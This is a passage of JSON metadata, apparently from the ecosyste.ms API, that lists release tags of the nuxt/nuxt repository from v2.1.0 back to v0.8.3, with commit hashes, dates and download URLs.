cies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v